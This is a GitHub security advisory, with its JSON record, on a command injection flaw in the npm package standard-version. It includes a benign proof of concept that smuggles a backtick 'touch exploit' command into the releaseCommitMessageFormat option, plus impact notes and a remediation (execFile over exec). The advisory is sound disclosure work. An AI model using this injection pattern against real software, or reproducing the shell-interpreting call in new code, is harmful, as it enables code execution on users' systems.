GHSA-7XCX-6WJH-7XP2
Vulnerability from github – Published: 2020-07-13 21:34 – Updated: 2021-09-22 21:03GitHub Security Lab (GHSL) Vulnerability Report: GHSL-2020-111
The GitHub Security Lab team has identified a potential security vulnerability in standard-version.
Summary
The standardVersion function has a command injection vulnerability. Clients of the standard-version library are unlikely to be aware of this, so they might unwittingly write code that contains a vulnerability.
Product
Standard Version
Tested Version
Commit 2f04ac8
Details
Issue 1: Command injection in standardVersion
The following proof-of-concept illustrates the vulnerability. First install Standard Version and create an empty git repo to run the PoC in:
npm install standard-version
git init
echo "foo" > foo.txt # the git repo has to be non-empty
git add foo.txt
git commit -am "initial commit"
Now create a file with the following contents:
var fs = require("fs");
// setting up a bit of environment
fs.writeFileSync("package.json", '{"name": "foo", "version": "1.0.0"}');
const standardVersion = require('standard-version')
standardVersion({
noVerify: true,
infile: 'foo.txt',
releaseCommitMessageFormat: "bla `touch exploit`"
})
and run it:
node test.js
Notice that a file named exploit has been created.
This vulnerability is similar to command injection vulnerabilities that have been found in other Javascript libraries. Here are some examples: CVE-2020-7646, CVE-2020-7614, CVE-2020-7597, CVE-2019-10778, CVE-2019-10776, CVE-2018-16462, CVE-2018-16461, CVE-2018-16460, CVE-2018-13797, CVE-2018-3786, CVE-2018-3772, CVE-2018-3746, CVE-2017-16100, CVE-2017-16042.
We have written a CodeQL query, which automatically detects this vulnerability. You can see the results of the query on the standard-version project here.
Impact
This issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input.
Remediation
We recommend not using an API that can interpret a string as a shell command. For example, use child_process.execFile instead of child_process.exec.
Credit
This issue was discovered and reported by GitHub Engineer @erik-krogh (Erik Krogh Kristensen).
Contact
You can contact the GHSL team at securitylab@github.com, please include GHSL-2020-111 in any communication regarding this issue.
Disclosure Policy
This report is subject to our coordinated disclosure policy.
{
"affected": [
{
"package": {
"ecosystem": "npm",
"name": "standard-version"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "8.0.1"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [],
"database_specific": {
"cwe_ids": [
"CWE-77"
],
"github_reviewed": true,
"github_reviewed_at": "2020-07-13T21:33:29Z",
"nvd_published_at": null,
"severity": "MODERATE"
},
"details": "# GitHub Security Lab (GHSL) Vulnerability Report: `GHSL-2020-111`\n\nThe [GitHub Security Lab](https://securitylab.github.com) team has identified a potential security vulnerability in [standard-version](https://github.com/conventional-changelog/standard-version).\n\n## Summary\n\nThe `standardVersion` function has a command injection vulnerability. Clients of the `standard-version` library are unlikely to be aware of this, so they might unwittingly write code that contains a vulnerability.\n\n## Product\nStandard Version\n \n## Tested Version\nCommit [2f04ac8](https://github.com/conventional-changelog/standard-version/tree/2f04ac8fc1c134a1981c23a093d4eece77d0bbb9/)\n\n## Details\n\n### Issue 1: Command injection in `standardVersion`\n\nThe following proof-of-concept illustrates the vulnerability. First install Standard Version and create an empty git repo to run the PoC in:\n\n```\nnpm install standard-version\ngit init\necho \"foo\" \u003e foo.txt # the git repo has to be non-empty\ngit add foo.txt\ngit commit -am \"initial commit\"\n```\n\nNow create a file with the following contents:\n\n```\nvar fs = require(\"fs\");\n// setting up a bit of environment\nfs.writeFileSync(\"package.json\", \u0027{\"name\": \"foo\", \"version\": \"1.0.0\"}\u0027);\n\nconst standardVersion = require(\u0027standard-version\u0027)\n\nstandardVersion({\n noVerify: true,\n infile: \u0027foo.txt\u0027,\n releaseCommitMessageFormat: \"bla `touch exploit`\"\n})\n```\n\nand run it:\n\n```\nnode test.js\n```\n\nNotice that a file named `exploit` has been created.\n\nThis vulnerability is similar to command injection vulnerabilities that have been found in other Javascript libraries. Here are some examples:\n[CVE-2020-7646](https://github.com/advisories/GHSA-m8xj-5v73-3hh8),\n[CVE-2020-7614](https://github.com/advisories/GHSA-426h-24vj-qwxf),\n[CVE-2020-7597](https://github.com/advisories/GHSA-5q88-cjfq-g2mh),\n[CVE-2019-10778](https://github.com/advisories/GHSA-4gp3-p7ph-x2jr),\n[CVE-2019-10776](https://github.com/advisories/GHSA-84cm-v6jp-gjmr),\n[CVE-2018-16462](https://github.com/advisories/GHSA-9jm3-5835-537m),\n[CVE-2018-16461](https://github.com/advisories/GHSA-7g2w-6r25-2j7p),\n[CVE-2018-16460](https://github.com/advisories/GHSA-cfhg-9x44-78h2),\n[CVE-2018-13797](https://github.com/advisories/GHSA-pp57-mqmh-44h7),\n[CVE-2018-3786](https://github.com/advisories/GHSA-c9j3-wqph-5xx9),\n[CVE-2018-3772](https://github.com/advisories/GHSA-wjr4-2jgw-hmv8),\n[CVE-2018-3746](https://github.com/advisories/GHSA-3pxp-6963-46r9),\n[CVE-2017-16100](https://github.com/advisories/GHSA-jcw8-r9xm-32c6),\n[CVE-2017-16042](https://github.com/advisories/GHSA-qh2h-chj9-jffq).\n\nWe have written a [CodeQL](https://codeql.com) query, which automatically detects this vulnerability. You can see the results of the query on the `standard-version` project [here](https://lgtm.com/query/237522640229151035/).\n\n#### Impact\n\nThis issue may lead to remote code execution if a client of the library calls the vulnerable method with untrusted input.\n\n#### Remediation\n\nWe recommend not using an API that can interpret a string as a shell command. For example, use [`child_process.execFile`](https://nodejs.org/api/child_process.html#child_process_child_process_execfile_file_args_options_callback) instead of [`child_process.exec`](https://nodejs.org/api/child_process.html#child_process_child_process_exec_command_options_callback).\n\n## Credit\n\nThis issue was discovered and reported by GitHub Engineer [@erik-krogh (Erik Krogh Kristensen)](https://github.com/erik-krogh).\n\n## Contact\n\nYou can contact the GHSL team at `securitylab@github.com`, please include `GHSL-2020-111` in any communication regarding this issue.\n\n## Disclosure Policy\n\nThis report is subject to our [coordinated disclosure policy](https://securitylab.github.com/disclosures#policy).",
"id": "GHSA-7xcx-6wjh-7xp2",
"modified": "2021-09-22T21:03:04Z",
"published": "2020-07-13T21:34:59Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/conventional-changelog/standard-version/security/advisories/GHSA-7xcx-6wjh-7xp2"
},
{
"type": "PACKAGE",
"url": "https://github.com/conventional-changelog/standard-version"
},
{
"type": "WEB",
"url": "https://github.com/conventional-changelog/standard-version/tree/2f04ac8fc1c134a1981c23a093d4eece77d0bbb9"
}
],
"schema_version": "1.4.0",
"severity": [],
"summary": "Command Injection in standard-version"
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.